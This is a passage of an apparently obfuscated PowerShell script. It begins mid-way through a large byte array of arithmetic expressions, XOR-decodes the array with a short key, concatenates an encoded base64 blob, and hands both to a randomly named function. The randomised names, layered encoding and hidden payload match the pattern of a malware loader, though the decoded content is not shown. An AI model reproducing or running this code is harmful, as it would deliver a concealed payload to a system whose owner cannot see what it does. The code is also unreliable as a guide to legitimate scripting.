8),(29+ 55), ( 59+34), ( 79 +25), ( 94+5), (6 +85), (59 + 67),( 75 + 21), ( 11 + 80),(5+ 79), (75+18), ( 78 + 38),(24 + 75),(29+59),(29+81),( 89 +10),( 80- 2),( 30 + 54), ( 74+ 20),( 5+95),(55+ 44),( 15+ 73),(23+87), (23 +73), (87+1),( 14+70),(1 +92),(4 +100),( 91+ 8), (17+59), ( 5+105),( 59 +40),( 16+56),(44+ 40),(11+82),(2+ 72), (64+35), (21+ 55),(18+ 108),( 55 +44),(95- 22), (53 +31), (70+23), ( 18 + 94), (86+13),(11 +80), (76 +50),( 47 +52),( 43+30), ( 68 + 16), (17 +76), (63+ 33), (94+5),(79+ 12), ( 86- 14), ( 90 +6),(96-11),( 32 +52), ( 5 +88), (77+ 39), ( 16 +83),(51 +37), (50 +60), ( 32+ 67),( 43 +36),( 72 + 12),(95- 1), ( 90 +10),(81 +18), (20 +70), ( 13+75), ( 72+ 24),( 20 + 71), (95-11), ( 24 +70), (3 + 105),( 78+21),(37 +42), ( 2 + 124), (65 +31),(39 -23), ( 44 + 40),(88+6),( 67 + 45),(95 +4), ( 83 + 8), 72, (62 +37), (16+ 63), ( 95- 11), ( 60 +33), ( 29 + 45), (88+ 11), (12+78), ( 35+ 53),(54 + 42), (72 - 54), ( 12 + 72),(12 + 81), (13 +61), ( 13 + 86),(47 + 44),(15 + 73),( 58 + 38), ( 32- 16),( 4+80),( 42+ 51), ( 31+81), ( 1 + 98),( 87 +1),( 43+ 83), (90+ 9), (26 +53), ( 54+ 30), (56 +37), ( 4 + 108),(31 + 68), ( 95 - 7),( 63 +25), (30 +69), ( 52+ 21), (60 + 24),(65+29),( 71+33), (68+31),( 96 - 17), (25 +101), (71+28), ( 44 +28),(21 + 63), ( 67 + 26), ( 100+ 20),(0+99), (13+ 66),( 75 + 13),( 95 + 4), (59 + 20), (20+64),( 35+59),(76 +36),(28+ 71), ( 81 - 2),(60+ 12),( 26+ 73),( 62 +10),( 36 +48), ( 20 + 73), (15 +89), (63 +36),(76 +12),(3 + 85), (45+51),(34 - 15),( 19 + 65), ( 71 +22),( 19 + 101), ( 7 +92),( 16+ 74), (23+65),( 12 +84), ( 20-2), (75 + 9), (4 +89), ( 70 + 46),(34+ 65),( 18 +73), (15 + 57),( 1+ 98), ( 81- 8), (61 +23),( 71 + 23), (24+92),(59 + 40), ( 26+65),( 72+54), (96+3),( 52+ 21), ( 26+58), (10 +83),(72 + 2), (47+ 52), ( 84 + 7), (2+108),(1 + 98), ( 84- 6),( 4 +80),( 75 + 18),( 94 -24), ( 43 +56),(41 +50), (85 - 13),(80+16),( 95 - 76),(33+51), (78 +16),( 72 +40),(83+ 16),( 25 +63),(48 +78),(58+ 38), ( 7 +16),( 77 + 7), ( 80+ 13), (33 +63),( 93 + 6),(4+87), (8+64),(94 + 2), ( 78 +7),( 86 -2), (2+ 91),(74 +38),(22+ 77), ( 72 + 19), ( 37+35), ( 26+ 70),(23- 1), (2 +82),(1 + 92), ( 7 +59),( 20+ 79),( 17+ 73), (35+ 53),(34+65),( 38 + 35), ( 23+61),(42+ 51), (48+ 18),(69 + 30), ( 33 +57),(98 - 10),(29 + 70), (95 -16), (11+ 73), (72 +22),( 17+87), (71 +28), (59 + 32), (41 + 31), (73 + 23), ( 10+ 81), ( 17 +67),(25+68),(76 -2), ( 9 + 90),( 87+ 1), ( 85 -13),(53 + 43),( 33 - 11), ( 65+ 19),( 25 +68),( 30 +74), ( 18 + 81), (48+43), ( 68 + 20),(71+25), ( 28+ 62),( 43+41),(32 +61),(91 + 9),( 7+ 92),(16+ 63), ( 58+14),( 3 + 93),(66+ 24),(36+48), ( 91 +2),(7 +113),( 34+ 65),(23+67), ( 94 -6),(16+83),( 19+ 53), ( 20 +64),( 18 + 75), (29 + 75), ( 42 + 57),(53+38), (52 + 36), (29+ 67), (57 -39), (91-7), ( 59+34), (3+ 97), (65+ 34),( 59 + 31),(58 + 14),( 50 +49),( 52 + 20), ( 5+79),( 47+47),(47+ 61), ( 16 + 83),(35 + 56), ( 27+83), (34 +65),(87- 13), ( 49 +35),( 16 + 77), (61 + 13),(50+ 49), (63 + 25), (94-6),( 85+11),( 10+12),(40+44),(54 + 39),( 73+ 47),(19+80), (59 +20),(66 +22), (24 + 75),( 73 + 1), (100- 16), ( 42+51), ( 13 + 95),(14 +85),(51 + 25),( 78+ 32),(86+ 10),( 94- 75), (13+ 71),( 44 + 50), ( 89+ 27), (56 + 43),(12 +79), ( 94- 22),(98+1), (25+48), ( 81+ 3), (58 + 35),(60 +14),(35+64),( 9+82),( 23 +87), (0 + 96),(1+16), ( 23 +61),( 96 -3),(36 +84), ( 75+ 24), (92-1),(44 +82), (44 + 52),( 0+85),(62+ 22), (30+ 63), (79 - 13),(70 + 29), (52+ 39), (31 +57),( 17+ 79),( 80+11), ( 72+ 12), (37 +56), (97 -23), ( 72 + 27),( 75 + 13),(24+64), ( 22+ 74), (47+ 43), ( 69 +15),(87+ 6),(37+67), (7 +92),( 8 +80),( 76 +50), (71+ 25), (84- 66), ( 37 + 47), ( 69 + 24),( 28+72), ( 66+33), ( 18 +70), (37+35), (99 -3), (58 + 32), (50 +34),( 31+ 62), (91+17),( 22 +77), ( 25+66), ( 100 + 26),( 46 +50),( 94 -71),(33 +51),( 31 + 63),( 78+42),(29 +70),( 98 - 7), (97+ 13),(3+ 93),(83- 66), (96- 12),( 58 + 36),( 45 + 59), (12+ 87),(89+ 2),( 76+50), ( 90 +6),( 20+ 3),(95 -11),(15+ 78), (79+21), (59 + 40), (51 + 28),(95 +31), ( 60+ 36),(64+24), (91-7),( 72 +21),( 36+ 60),(23+76), ( 50 + 26), 72, (20 + 76), (90 - 5), ( 70+14), (53 + 40),( 74+38), ( 12 +87),(92 - 13),(38 +50), (43+ 56), (33 +40), (13+ 71), ( 44 + 49),( 79 - 13),(51+48),(65+23),(91+ 35), ( 22 +74),(27+61),(19 +65),(84 + 9),(77- 7),(9 + 90),(63 +13),( 47+79), (37+62), ( 12+67), (2+82), (6 +87),( 59 + 53), (65 + 34),( 46 +33), ( 13+ 59),( 57 + 39),( 83+ 2), (31+ 53), (43 + 50),( 11+89), ( 9 +90),( 70 + 21),(92+ 18), (14 + 85), (2 +76),(48 +36), ( 33 +60),( 71 + 45),(83+16), ( 0 + 90),( 86 +2),( 24+ 72),( 79+ 6),(96 -12),( 79 +15), (8+92),( 86+13),( 82+ 9),(18 +70), ( 99 - 3),( 12+78), ( 18 +66), ( 65 +29),(79 +41), ( 24 + 75),( 24 + 52),(36+ 74), ( 25+ 74), (33 +40),(77 +7), ( 18+ 76),( 31 +73), ( 39+ 60),( 54 +22),( 81 - 9), (67+29),(23 -7),( 22 + 62),(23 +71),( 88 + 24), (36 + 63),( 36 + 40), ( 24+102), (63+ 36), ( 21+ 54),(70+ 14), (43 +50),( 100+ 12),(62+37),(100- 24),( 64 + 62), ( 60+36),(4 + 12),(63+21),(11+82), (77- 11), ( 50 +49),91, ( 26 + 62), ( 13+ 83), ( 30- 8),(50+34), ( 75 +18), (52 + 68),(4 +95),(18 +58), (67 + 43),(100 -1), (49 + 24),( 99-15), ( 1+ 92),( 57 + 55), (62 + 37), ( 22+68), (87 - 15),(25 +71), ( 98-75),( 71 + 13), ( 59+34),(100- 34), (58 + 41),( 29 +59), (30+42), ( 73+ 23),( 26 -7),( 26 +58), (78 +15), (41 + 33), (52+ 47), ( 13 + 66),( 95-23), (32 +64), ( 59- 42), ( 16+ 68),(24+69), ( 64+6),( 6+ 93), (45 +45), ( 77 +11),(72+ 24), (8+ 11),( 80+4),(32 +62),( 96+ 12),(29 + 70), (4+72), (49+61), (98- 2),( 63 - 44), ( 62 +22), ( 25 +68),(95 +25), ( 56 +43),( 82+ 6), ( 76 - 4),( 25 + 74), ( 65+ 10), (90 - 6),(18+75),( 87+13), ( 49 +50),( 49+41),( 20+52),(62 +34), ( 35 -13),( 38 + 46), ( 52 +42),( 52 +52), (91+ 8), ( 12 +64),(44 + 82),(7+ 89), (66 + 19), ( 62 +22), (1+ 93),( 98+ 2),( 91 +8), ( 32 + 47), (12+ 76),(7+89),(95 - 7),( 98 - 14),( 71 + 22), (69 +51),(19+ 80), (98- 10),( 32 + 78),( 31 + 65), (59- 42), ( 100 -16),( 61 +32),(46 +74),( 25+ 74), ( 14 +76),(23 +49), (47 + 49), (92- 73),(82 +2),(63 +30),(69+ 1), (48+ 51), ( 9 + 81),(93 - 5), (57+39),( 33 -15), ( 89-5), ( 54+40),( 30+ 70),( 67+ 32), ( 60+ 19),(75- 3),(73+26),(88 - 9),(95- 11),(60+33),(30 + 70), ( 35 +64), ( 81- 5),( 78- 6),( 44 + 52), (87+3), (33+ 51), (31+ 62), ( 11+89), ( 68+31),(16 +60), ( 86 +40), ( 50+49), (43 + 35),(35 + 49), ( 13 +80), (76 - 2),(82+ 17),( 51 + 37), ( 50 + 22),(15+ 81), (98 - 10), (68+ 16), ( 96 - 3), ( 48+56), ( 33 + 66),( 45 +45),( 36 + 52), (81+15), (27- 9),( 31 + 53),(30 +64), (40+ 72),( 33+ 66),(51+28), (53 + 35),( 33 +63), ( 12 + 6),( 28 +56),( 31 +63),(85+27),( 49+50))
$aWJBc=@((57 - 36), ( 14 +11), (39 - 6),(91 - 57))
$OfJZ =@() 
FOr ( $i = 0; $i-lt  $ifvQDTpU.leNgTh; $i++) {$OfJZ+= $ifvQDTpU[$i] -bxor $aWJBc[ ($i % $aWJBc.length)]}
$OfJZ = ([chAR []]$OfJZ ) -jOin ''
$CLDrF = 'DcjZumpgAADQV9kX5/vObRQikql2A1JEhvwqUhJlzPDu56zL9efjZ8Uz/6F+/o633EGqYZzUJpX8zZ5mTh6cib7GRTLCL2ilhd8l3s+P6JkWC2mmUfMSF+xIqJY5U3in'
$CLDrF+='YbBp9riOS8g2Y/SjAO01o/h0EE03DhbQcGsMOJtF8R4+ITdUBoT93R3Dpt1fpduc3ZmZok4G3zt5HlqxBYRz4t08/0VkGzYJvcpfXEJNlRgLIASzZtPf57XcnYQ2DQIf'
$CLDrF+= 'jw83FS6QbgGxcoe5u+LljPn49muiMaTq68z0n1qb9hOINX/PdjaduRGyZDb1COOevByVoHjRQnegHsOgTf1q01I1GT4g7DPL+M9bVJq9yQLK7t7M9mGz9lJyIofXSegK'
$CLDrF+='QDnbVZUHfGDloCqDB9YXL8BpYoi1ru2u9omx+4UdU5hKJ9O6xcTKWIxluSnl2jBc5KzRffElhAdRKtxF9WdpwOH/IyJSflms2WM6uoSlmwFKdZMN19XHZexduVAvfXiD'
$CLDrF+= 'Kfkj2c0jg7z4cyNWp0nEDSqVfFrVehVH/r1/zRpRL9F5O35l1yEASMW9/THs3VNN1O0Ab0k5F+euBdHcZfJZsL0l2BiT67JIk++3RHnaxJM0tO7MZfo6YJ7Rh4PmqLpi'
$xxbbe='vg34AwH0Pqvrov30iUtch+rUlTR6EBFrn28wq7jTo4kGUA9485XC11QzJuGHzIWKPgb4U9bv92bVHCOiQS+ssA8VzzlnJvJmYBTqYzxf28LWGYfKcjNNFqNDRsDd338=' 
$xxbbe = $CLDrF+ $xxbbe 
lrXZedpm -xTuU $pCYqt -HGuGrFIV $OfJZ -mlZsEs $xxbbe

